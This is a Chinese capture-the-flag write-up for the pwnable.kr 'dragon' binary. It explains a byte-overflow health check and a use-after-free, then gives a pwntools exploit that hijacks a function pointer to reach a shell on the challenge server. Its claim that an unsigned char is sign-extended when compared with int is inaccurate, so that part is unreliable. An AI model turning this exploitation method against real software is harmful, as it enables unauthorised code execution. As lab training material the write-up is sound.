前言
这道题找溢出找了半天,游戏也玩了半天,唉最后还是细心读代码找出了漏洞。这是一个c语言不同类型比较隐式转换导致的漏洞,还是有点意思的。
分析
放ida逆向一下,程序代码逻辑有点长,不过认真读的话还是能理解的。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20int PlayGame()
{
int result; // eax@1
while ( 1 )
{
while ( 1 )
{
puts("Choose Your Hero\n[ 1 ] Priest\n[ 2 ] Knight");
result = GetChoice();
if ( result != 1 && result != 2 )
break;
FightDragon(result);
}
if ( result != 3 )
break;
SecretLevel();
}
return result;
}
1 | void __cdecl FightDragon(int a1) |
1 | int __cdecl PriestAttack(int a1, void *ptr) |
1 | int SecretLevel() |
贴了几个关键的函数反编译代码,程序逻辑就不细说了,下面只记录关键部分。
在SecretLevel
函数中有一段执行shell的代码,但是没办法绕过判断。程序的漏洞在PriestAttack
函数内,该函数在怪物的血量不大于0时跳出循环,但是记录怪物血量的变量是BYTE
类型的,也就是unsigned char
类型。与它比较的0默认情况是signed int
。
在c语言中不同类型的变量做比较会进行隐式类型转换,短长度类型会向较长长度类型转换,长度一致符号不同则向无符号转换,整数会向float转换,float会向double转换。这些网上都能搜到,所以就不继续说了。
那么这里的比较,BYTE
就会向signed int
转换。如果此时怪物血量为128
,转换为二进制就是10000000
,那么进行符号扩展时就变成了0xffffff80
,而这个数其符号位为1
所以是个负数,那么函数就会跳出循环并返回1
。然而使怪物的血量达到128
是可行的,可以使用第一个英雄挑战Mama Dragon
,每个回合配合使用3
和2
技能使怪物自动增长血量,最后就能使怪物血量达到128。
接下来就是游戏胜利的判断了。1
2
3
4
5
6
7
8
9if ( v3 )
{
puts("Well Done Hero! You Killed The Dragon!");
puts("The World Will Remember You As:");
v2 = malloc(0x10u);
__isoc99_scanf("%16s", v2);
puts("And The Dragon You Have Defeated Was Called:");
((void (__cdecl *)(_DWORD *))*v5)(v5);
}
进入该判断后,由于在前面的函数中v5
这个堆指针已经释放了但是没有置0,这里马上又申请了一个大小一样的堆空间,那么根据glibc的堆分配策略这里的v2
会引用之前v5
指向的堆,接下来v2
的内容可控下面又有v5
函数的调用,所以就可以写入任意地址来执行了。这里算是一个UAF
漏洞。
知道了利用方法下面给出exp1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17from pwn import *
def work(DEBUG):
context(arch='i386',os='linux',log_level='info')
if DEBUG:
r = process('./dragon')
else:
r = remote('pwnable.kr',9004)
target_addr = 0x08048dbf
r.send("1\n"*3+'1\n'+"3\n3\n2\n"*4)
r.recvuntil("You As:\n")
r.sendline(p32(target_addr))
r.interactive()
work(False)
1 | root@1:~/桌面/test$ python 1.py |
总结
在c语言编码时得注意不同类型变量的比较,很有可能在隐式转换时造成漏洞。